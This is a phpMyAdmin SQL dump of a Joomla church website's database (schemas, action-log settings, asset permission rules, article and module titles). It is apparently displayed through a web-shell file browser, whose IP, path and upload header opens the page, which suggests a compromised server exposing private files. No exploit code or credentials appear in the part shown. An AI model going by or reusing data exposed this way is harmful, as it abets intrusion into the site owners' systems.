Your IP : 3.15.201.103


Current Path : /home/areogun/
Upload File :
Current File : //home/areogun/lifeoasi_loic_new.sql

-- phpMyAdmin SQL Dump
-- version 4.8.3
-- https://www.phpmyadmin.net/
--
-- Host: localhost:3306
-- Generation Time: Sep 28, 2019 at 07:57 PM
-- Server version: 5.5.61-cll
-- PHP Version: 7.2.7

SET SQL_MODE = "NO_AUTO_VALUE_ON_ZERO";
SET AUTOCOMMIT = 0;
START TRANSACTION;
SET time_zone = "+00:00";


/*!40101 SET @OLD_CHARACTER_SET_CLIENT=@@CHARACTER_SET_CLIENT */;
/*!40101 SET @OLD_CHARACTER_SET_RESULTS=@@CHARACTER_SET_RESULTS */;
/*!40101 SET @OLD_COLLATION_CONNECTION=@@COLLATION_CONNECTION */;
/*!40101 SET NAMES utf8mb4 */;

--
-- Database: `lifeoasi_loic_new`
--

-- --------------------------------------------------------

--
-- Table structure for table `y57u5_action_logs`
--

CREATE TABLE `y57u5_action_logs` (
  `id` int(10) UNSIGNED NOT NULL,
  `message_language_key` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `message` text COLLATE utf8mb4_unicode_ci NOT NULL,
  `log_date` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `extension` varchar(50) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `user_id` int(11) NOT NULL DEFAULT '0',
  `item_id` int(11) NOT NULL DEFAULT '0',
  `ip_address` varchar(40) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '0.0.0.0'
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;

-- --------------------------------------------------------

--
-- Table structure for table `y57u5_action_logs_extensions`
--

CREATE TABLE `y57u5_action_logs_extensions` (
  `id` int(10) UNSIGNED NOT NULL,
  `extension` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT ''
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;

--
-- Dumping data for table `y57u5_action_logs_extensions`
--

INSERT INTO `y57u5_action_logs_extensions` (`id`, `extension`) VALUES
(1, 'com_banners'),
(2, 'com_cache'),
(3, 'com_categories'),
(4, 'com_config'),
(5, 'com_contact'),
(6, 'com_content'),
(7, 'com_installer'),
(8, 'com_media'),
(9, 'com_menus'),
(10, 'com_messages'),
(11, 'com_modules'),
(12, 'com_newsfeeds'),
(13, 'com_plugins'),
(14, 'com_redirect'),
(15, 'com_tags'),
(16, 'com_templates'),
(17, 'com_users'),
(18, 'com_checkin');

-- --------------------------------------------------------

--
-- Table structure for table `y57u5_action_logs_users`
--

CREATE TABLE `y57u5_action_logs_users` (
  `user_id` int(11) UNSIGNED NOT NULL,
  `notify` tinyint(1) UNSIGNED NOT NULL,
  `extensions` text COLLATE utf8mb4_unicode_ci NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;

-- --------------------------------------------------------

--
-- Table structure for table `y57u5_action_log_config`
--

CREATE TABLE `y57u5_action_log_config` (
  `id` int(10) UNSIGNED NOT NULL,
  `type_title` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `type_alias` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `id_holder` varchar(255) COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `title_holder` varchar(255) COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `table_name` varchar(255) COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `text_prefix` varchar(255) COLLATE utf8mb4_unicode_ci DEFAULT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;

--
-- Dumping data for table `y57u5_action_log_config`
--

INSERT INTO `y57u5_action_log_config` (`id`, `type_title`, `type_alias`, `id_holder`, `title_holder`, `table_name`, `text_prefix`) VALUES
(1, 'article', 'com_content.article', 'id', 'title', '#__content', 'PLG_ACTIONLOG_JOOMLA'),
(2, 'article', 'com_content.form', 'id', 'title', '#__content', 'PLG_ACTIONLOG_JOOMLA'),
(3, 'banner', 'com_banners.banner', 'id', 'name', '#__banners', 'PLG_ACTIONLOG_JOOMLA'),
(4, 'user_note', 'com_users.note', 'id', 'subject', '#__user_notes', 'PLG_ACTIONLOG_JOOMLA'),
(5, 'media', 'com_media.file', '', 'name', '', 'PLG_ACTIONLOG_JOOMLA'),
(6, 'category', 'com_categories.category', 'id', 'title', '#__categories', 'PLG_ACTIONLOG_JOOMLA'),
(7, 'menu', 'com_menus.menu', 'id', 'title', '#__menu_types', 'PLG_ACTIONLOG_JOOMLA'),
(8, 'menu_item', 'com_menus.item', 'id', 'title', '#__menu', 'PLG_ACTIONLOG_JOOMLA'),
(9, 'newsfeed', 'com_newsfeeds.newsfeed', 'id', 'name', '#__newsfeeds', 'PLG_ACTIONLOG_JOOMLA'),
(10, 'link', 'com_redirect.link', 'id', 'old_url', '#__redirect_links', 'PLG_ACTIONLOG_JOOMLA'),
(11, 'tag', 'com_tags.tag', 'id', 'title', '#__tags', 'PLG_ACTIONLOG_JOOMLA'),
(12, 'style', 'com_templates.style', 'id', 'title', '#__template_styles', 'PLG_ACTIONLOG_JOOMLA'),
(13, 'plugin', 'com_plugins.plugin', 'extension_id', 'name', '#__extensions', 'PLG_ACTIONLOG_JOOMLA'),
(14, 'component_config', 'com_config.component', 'extension_id', 'name', '', 'PLG_ACTIONLOG_JOOMLA'),
(15, 'contact', 'com_contact.contact', 'id', 'name', '#__contact_details', 'PLG_ACTIONLOG_JOOMLA'),
(16, 'module', 'com_modules.module', 'id', 'title', '#__modules', 'PLG_ACTIONLOG_JOOMLA'),
(17, 'access_level', 'com_users.level', 'id', 'title', '#__viewlevels', 'PLG_ACTIONLOG_JOOMLA'),
(18, 'banner_client', 'com_banners.client', 'id', 'name', '#__banner_clients', 'PLG_ACTIONLOG_JOOMLA'),
(19, 'application_config', 'com_config.application', '', 'name', '', 'PLG_ACTIONLOG_JOOMLA');

-- --------------------------------------------------------

--
-- Table structure for table `y57u5_assets`
--

CREATE TABLE `y57u5_assets` (
  `id` int(10) UNSIGNED NOT NULL COMMENT 'Primary Key',
  `parent_id` int(11) NOT NULL DEFAULT '0' COMMENT 'Nested set parent.',
  `lft` int(11) NOT NULL DEFAULT '0' COMMENT 'Nested set lft.',
  `rgt` int(11) NOT NULL DEFAULT '0' COMMENT 'Nested set rgt.',
  `level` int(10) UNSIGNED NOT NULL COMMENT 'The cached level in the nested tree.',
  `name` varchar(50) COLLATE utf8mb4_unicode_ci NOT NULL COMMENT 'The unique name for the asset.\n',
  `title` varchar(100) COLLATE utf8mb4_unicode_ci NOT NULL COMMENT 'The descriptive title for the asset.',
  `rules` varchar(5120) COLLATE utf8mb4_unicode_ci NOT NULL COMMENT 'JSON encoded access control.'
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;

--
-- Dumping data for table `y57u5_assets`
--

INSERT INTO `y57u5_assets` (`id`, `parent_id`, `lft`, `rgt`, `level`, `name`, `title`, `rules`) VALUES
(1, 0, 1, 936, 0, 'root.1', 'Root Asset', '{\"core.login.site\":{\"6\":1,\"2\":1},\"core.login.admin\":{\"6\":1,\"3\":1},\"core.login.offline\":{},\"core.admin\":{\"8\":1},\"core.manage\":{\"7\":1},\"core.create\":{\"6\":1,\"3\":1},\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1},\"core.edit.own\":{\"6\":1,\"3\":1}}'),
(2, 1, 1, 2, 1, 'com_admin', 'com_admin', '{}'),
(3, 1, 3, 8, 1, 'com_banners', 'com_banners', '{\"core.admin\":{\"7\":1},\"core.manage\":{\"6\":1},\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),
(4, 1, 9, 10, 1, 'com_cache', 'com_cache', '{\"core.admin\":{\"7\":1},\"core.manage\":{\"7\":1}}'),
(5, 1, 11, 12, 1, 'com_checkin', 'com_checkin', '{\"core.admin\":{\"7\":1},\"core.manage\":{\"7\":1}}'),
(6, 1, 13, 14, 1, 'com_config', 'com_config', '{}'),
(7, 1, 15, 20, 1, 'com_contact', 'com_contact', '{\"core.admin\":{\"7\":1},\"core.manage\":{\"6\":1},\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[],\"core.edit.own\":[]}'),
(8, 1, 21, 230, 1, 'com_content', 'com_content', '{\"core.admin\":{\"7\":1},\"core.manage\":{\"6\":1},\"core.create\":{\"3\":1},\"core.delete\":{},\"core.edit\":{\"4\":1},\"core.edit.state\":{\"5\":1},\"core.edit.own\":{}}'),
(9, 1, 231, 232, 1, 'com_cpanel', 'com_cpanel', '{}'),
(10, 1, 233, 234, 1, 'com_installer', 'com_installer', '{\"core.admin\":{\"7\":1},\"core.manage\":{\"7\":1},\"core.delete\":[],\"core.edit.state\":[]}'),
(11, 1, 235, 236, 1, 'com_languages', 'com_languages', '{\"core.admin\":{\"7\":1},\"core.manage\":[],\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),
(12, 1, 237, 238, 1, 'com_login', 'com_login', '{}'),
(13, 1, 239, 240, 1, 'com_mailto', 'com_mailto', '{}'),
(14, 1, 241, 242, 1, 'com_massmail', 'com_massmail', '{}'),
(15, 1, 243, 244, 1, 'com_media', 'com_media', '{\"core.admin\":{\"7\":1},\"core.manage\":{\"6\":1,\"3\":1},\"core.create\":{\"3\":1},\"core.delete\":{\"5\":1}}'),
(16, 1, 245, 250, 1, 'com_menus', 'com_menus', '{\"core.admin\":{\"7\":1},\"core.manage\":[],\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),
(17, 1, 251, 252, 1, 'com_messages', 'com_messages', '{\"core.admin\":{\"7\":1},\"core.manage\":{\"7\":1}}'),
(18, 1, 253, 478, 1, 'com_modules', 'com_modules', '{\"core.admin\":{\"7\":1},\"core.manage\":[],\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),
(19, 1, 479, 482, 1, 'com_newsfeeds', 'com_newsfeeds', '{\"core.admin\":{\"7\":1},\"core.manage\":{\"6\":1},\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[],\"core.edit.own\":[]}'),
(20, 1, 483, 484, 1, 'com_plugins', 'com_plugins', '{\"core.admin\":{\"7\":1},\"core.manage\":[],\"core.edit\":[],\"core.edit.state\":[]}'),
(21, 1, 485, 486, 1, 'com_redirect', 'com_redirect', '{\"core.admin\":{\"7\":1},\"core.manage\":[]}'),
(22, 1, 487, 488, 1, 'com_search', 'com_search', '{\"core.admin\":{\"7\":1},\"core.manage\":{\"6\":1}}'),
(23, 1, 489, 490, 1, 'com_templates', 'com_templates', '{\"core.admin\":{\"7\":1},\"core.manage\":[],\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),
(24, 1, 491, 492, 1, 'com_users', 'com_users', '{\"core.admin\":{\"7\":1},\"core.manage\":[],\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.own\":{\"6\":1},\"core.edit.state\":[]}'),
(26, 1, 493, 494, 1, 'com_wrapper', 'com_wrapper', '{}'),
(27, 8, 22, 73, 2, 'com_content.category.2', 'Features', '{\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[],\"core.edit.own\":[]}'),
(28, 3, 4, 5, 2, 'com_banners.category.3', 'Uncategorised', '{\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),
(29, 7, 16, 17, 2, 'com_contact.category.4', 'Uncategorised', '{\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[],\"core.edit.own\":[]}'),
(30, 19, 480, 481, 2, 'com_newsfeeds.category.5', 'Uncategorised', '{\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[],\"core.edit.own\":[]}'),
(32, 8, 74, 75, 2, 'com_content.category.7', 'Blog', '{\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[],\"core.edit.own\":[]}'),
(33, 27, 23, 24, 3, 'com_content.article.1', 'Module Layouts', '{\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),
(36, 27, 25, 26, 3, 'com_content.article.4', 'Shortcodes', '{\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),
(37, 102, 117, 118, 3, 'com_content.article.5', 'Make that idea your life', '{\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),
(40, 102, 113, 114, 3, 'com_content.article.8', 'You only live once - Live well', '{\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),
(41, 102, 119, 120, 3, 'com_content.article.9', 'Be kind whenever possible', '{\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),
(43, 102, 115, 116, 3, 'com_content.article.11', 'Music is food for the soul', '{\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),
(56, 7, 18, 19, 2, 'com_contact.category.8', 'Contacts', '{\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[],\"core.edit.own\":[]}'),
(66, 1, 858, 859, 1, 'com_rokcandy.category.13', 'Basic', ''),
(68, 1, 860, 861, 1, 'com_rokcandy.category.15', 'Uncategorised', ''),
(74, 8, 76, 111, 2, 'com_content.category.19', 'Demo', '{\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[],\"core.edit.own\":[]}'),
(75, 74, 77, 78, 3, 'com_content.article.23', 'Full Width', '{\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),
(76, 74, 79, 80, 3, 'com_content.article.24', 'Content + Right', '{\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),
(77, 74, 81, 82, 3, 'com_content.article.25', 'Left + Content', '{\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),
(78, 74, 83, 84, 3, 'com_content.article.26', 'Left + Content + Right', '{\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),
(79, 80, 86, 87, 4, 'com_content.article.27', 'The Church', '{\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),
(80, 74, 85, 96, 3, 'com_content.category.20', 'Pages', '{\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[],\"core.edit.own\":[]}'),
(82, 80, 88, 89, 4, 'com_content.article.28', 'Service Time', '{\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),
(83, 74, 97, 98, 3, 'com_content.article.29', 'Column Blocks', '{\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),
(85, 80, 90, 91, 4, 'com_content.article.31', 'Testimonies', '{\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),
(86, 80, 92, 93, 4, 'com_content.article.32', 'Frequently Asked Questions', '{\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),
(92, 74, 99, 100, 3, 'com_content.article.37', '2 Column Gallery', '{\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),
(93, 74, 101, 102, 3, 'com_content.article.38', '3 Column Gallery', '{\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),
(94, 74, 103, 104, 3, 'com_content.article.39', '4 Column Gallery', '{\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),
(95, 80, 94, 95, 4, 'com_content.article.40', 'Gallery in Blocks', '{\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),
(97, 27, 31, 32, 3, 'com_content.article.42', 'Gallery by Category', '{\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),
(98, 74, 105, 106, 3, 'com_content.article.43', '5 Column Gallery', '{\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),
(100, 74, 107, 108, 3, 'com_content.article.45', 'Video Portfolio', '{\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),
(101, 27, 33, 34, 3, 'com_content.article.46', 'Audio Portfolio', '{\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),
(102, 8, 112, 125, 2, 'com_content.category.22', 'Joomla', '{\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[],\"core.edit.own\":[]}'),
(104, 8, 126, 127, 2, 'com_content.category.23', 'Testimonials', '{\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[],\"core.edit.own\":[]}'),
(127, 27, 37, 38, 3, 'com_content.article.61', 'Pricing Tables', '{\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),
(132, 1, 864, 865, 1, 'com_roksprocket', 'roksprocket', '{}'),
(137, 8, 128, 137, 2, 'com_content.category.26', 'Slides', '{\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[],\"core.edit.own\":[]}'),
(138, 137, 129, 130, 3, 'com_content.article.65', 'Healing Revival Meetings', '{\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),
(139, 137, 131, 132, 3, 'com_content.article.66', 'Arise and Shine', '{\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),
(140, 137, 133, 134, 3, 'com_content.article.67', 'Trip to Egypt, this fall', '{\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),
(141, 137, 135, 136, 3, 'com_content.article.68', 'Worship Live Concert!', '{\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),
(142, 8, 138, 157, 2, 'com_content.category.27', 'Portfolio', '{\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[],\"core.edit.own\":[]}'),
(143, 142, 139, 140, 3, 'com_content.article.69', 'Do not dwell in the past', '{\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),
(144, 142, 141, 142, 3, 'com_content.article.70', 'The world owes you nothing', '{\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),
(145, 142, 143, 144, 3, 'com_content.article.71', 'This is the way to success', '{\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),
(146, 142, 145, 146, 3, 'com_content.article.72', 'We are the change we seek', '{\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),
(147, 142, 147, 148, 3, 'com_content.article.73', 'live on that idea', '{\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),
(148, 142, 149, 150, 3, 'com_content.article.74', 'Change your attitude', '{\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),
(149, 8, 158, 159, 2, 'com_content.category.28', 'Quotes', '{\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[],\"core.edit.own\":[]}'),
(151, 142, 151, 152, 3, 'com_content.article.76', 'Have faith in your abilities', '{\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),
(152, 142, 153, 154, 3, 'com_content.article.77', 'Everything should be simple', '{\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),
(153, 142, 155, 156, 3, 'com_content.article.78', 'It is always possible', '{\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),
(157, 8, 160, 167, 2, 'com_content.category.29', 'You are Welcome', '{\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[],\"core.edit.own\":[]}'),
(158, 157, 161, 162, 3, 'com_content.article.82', 'You are Welcome', '{\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),
(159, 157, 163, 164, 3, 'com_content.article.83', 'Keep daily appointment with God', '{\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),
(160, 157, 165, 166, 3, 'com_content.article.84', 'Don\'t serve God carelessly', '{\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),
(161, 1, 866, 871, 1, 'com_jevents', 'jevents', '{\"core.manage\":[],\"core.create\":[],\"core.edit.own\":[],\"core.edit\":[],\"core.edit.state\":[],\"core.deleteall\":[],\"core.admin\":[]}'),
(162, 161, 867, 868, 2, 'com_jevents.category.30', 'Default', '{\"core.create\":[],\"core.edit\":[],\"core.edit.state\":[],\"core.deleteall\":[],\"core.edit.own\":[]}'),
(163, 8, 168, 175, 2, 'com_content.category.31', 'Tabs', '{\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[],\"core.edit.own\":[]}'),
(164, 163, 169, 170, 3, 'com_content.article.85', 'Tab 1', '{\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),
(165, 163, 171, 172, 3, 'com_content.article.86', 'Tab 2', '{\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),
(166, 163, 173, 174, 3, 'com_content.article.87', 'Tab 3', '{\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),
(167, 314, 193, 194, 3, 'com_content.article.88', 'Our Founder', '{\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),
(168, 8, 176, 189, 2, 'com_content.category.32', 'Sermons', '{\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[],\"core.edit.own\":[]}'),
(169, 168, 177, 178, 3, 'com_content.article.89', 'My Redeemer Liveth', '{\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),
(170, 168, 179, 180, 3, 'com_content.article.90', 'Spiritual Adoption', '{\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),
(171, 168, 181, 182, 3, 'com_content.article.91', 'The Perfection', '{\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),
(172, 168, 183, 184, 3, 'com_content.article.92', 'Believe From The Heart', '{\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),
(173, 168, 185, 186, 3, 'com_content.article.93', 'Faith Is Our Victory', '{\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),
(174, 168, 187, 188, 3, 'com_content.article.94', 'Strait Is The Gate', '{\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),
(177, 1, 872, 873, 1, 'com_k2', 'com_k2', '{\"core.admin\":{},\"core.manage\":{\"3\":1},\"core.create\":{},\"core.delete\":{},\"core.edit\":{},\"core.edit.state\":{},\"core.edit.own\":{}}'),
(178, 3, 6, 7, 2, 'com_banners.category.33', 'envato', '{\"core.create\":{\"6\":1,\"3\":1},\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),
(179, 1, 874, 875, 1, 'com_joomlaupdate', 'com_joomlaupdate', '{\"core.admin\":{\"8\":1},\"core.manage\":{\"7\":1},\"core.delete\":{\"6\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),
(180, 1, 876, 877, 1, '#__ucm_content.1', '#__ucm_content.1', '[]'),
(181, 1, 878, 879, 1, 'com_finder', 'com_finder', '{}'),
(182, 1, 880, 881, 1, 'com_tags', 'com_tags', '{}'),
(183, 1, 882, 883, 1, 'com_contenthistory', 'com_contenthistory', '{}'),
(184, 1, 884, 885, 1, 'com_ajax', 'com_ajax', '{}'),
(185, 1, 886, 887, 1, 'com_postinstall', 'com_postinstall', '{}'),
(188, 18, 254, 255, 2, 'com_modules.module.399', 'Tag Cloud', '{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),
(189, 18, 256, 257, 2, 'com_modules.module.400', 'Mega Menu', '{\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),
(190, 18, 258, 259, 2, 'com_modules.module.346', 'Events Countdown', '{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),
(191, 18, 260, 261, 2, 'com_modules.module.39', 'Login', '{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),
(192, 18, 262, 263, 2, 'com_modules.module.365', 'Upcoming Events', '{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1},\"module.edit.frontend\":[]}'),
(193, 18, 264, 265, 2, 'com_modules.module.358', 'Events Calendar', '{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1},\"module.edit.frontend\":[]}'),
(195, 18, 266, 267, 2, 'com_modules.module.315', 'Front-page filterable portfolio', ''),
(196, 18, 268, 269, 2, 'com_modules.module.319', 'Filterable portfolio', ''),
(197, 18, 270, 271, 2, 'com_modules.module.360', 'Media', '{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1},\"module.edit.frontend\":[]}'),
(198, 18, 272, 273, 2, 'com_modules.module.354', 'Joomla', '{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),
(199, 18, 274, 275, 2, 'com_modules.module.401', 'Module', '{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),
(200, 18, 276, 277, 2, 'com_modules.module.386', 'Blog Category', '{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1},\"module.edit.frontend\":[]}'),
(201, 18, 278, 279, 2, 'com_modules.module.385', 'Blog', '{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),
(202, 18, 280, 281, 2, 'com_modules.module.389', 'Calendar', '{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1},\"module.edit.frontend\":[]}'),
(203, 18, 282, 283, 2, 'com_modules.module.388', 'Tags', '{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1},\"module.edit.frontend\":[]}'),
(204, 18, 284, 285, 2, 'com_modules.module.387', 'Comments', '{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1},\"module.edit.frontend\":[]}'),
(205, 18, 286, 287, 2, 'com_modules.module.38', 'Logo', '{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1},\"module.edit.frontend\":[]}'),
(206, 18, 288, 289, 2, 'com_modules.module.402', 'Offcanvas menu', '{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1},\"module.edit.frontend\":[]}'),
(207, 27, 39, 40, 3, 'com_content.article.95', 'Icon Fonts', '{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),
(209, 18, 290, 291, 2, 'com_modules.module.129', 'Free E-Books', '{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),
(210, 18, 292, 293, 2, 'com_modules.module.130', 'Web Streaming', '{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),
(211, 18, 294, 295, 2, 'com_modules.module.376', 'Join our mailing list', '{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1},\"module.edit.frontend\":[]}'),
(212, 18, 296, 297, 2, 'com_modules.module.234', 'Dream Centre World Wide', '{}'),
(213, 18, 298, 299, 2, 'com_modules.module.265', 'Quick Links', ''),
(214, 18, 300, 301, 2, 'com_modules.module.349', 'Words from our senior pastors', '{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1},\"module.edit.frontend\":[]}'),
(215, 18, 302, 303, 2, 'com_modules.module.50', 'Live Streaming', '{\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),
(216, 18, 304, 305, 2, 'com_modules.module.214', 'Sidebar B', '{\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),
(217, 18, 306, 307, 2, 'com_modules.module.338', 'Sidebar B', '{\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),
(218, 18, 308, 309, 2, 'com_modules.module.213', 'Sidebar B', '{\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),
(219, 18, 310, 311, 2, 'com_modules.module.339', 'Sidebar B', '{\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),
(221, 18, 312, 313, 2, 'com_modules.module.363', 'Vertical Menu', '{\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[],\"module.edit.frontend\":[]}'),
(222, 18, 314, 315, 2, 'com_modules.module.337', 'Sidebar B', '{\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),
(223, 18, 316, 317, 2, 'com_modules.module.131', 'podcast', '{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),
(224, 18, 318, 319, 2, 'com_modules.module.314', 'rokSprocket Slider', '{}'),
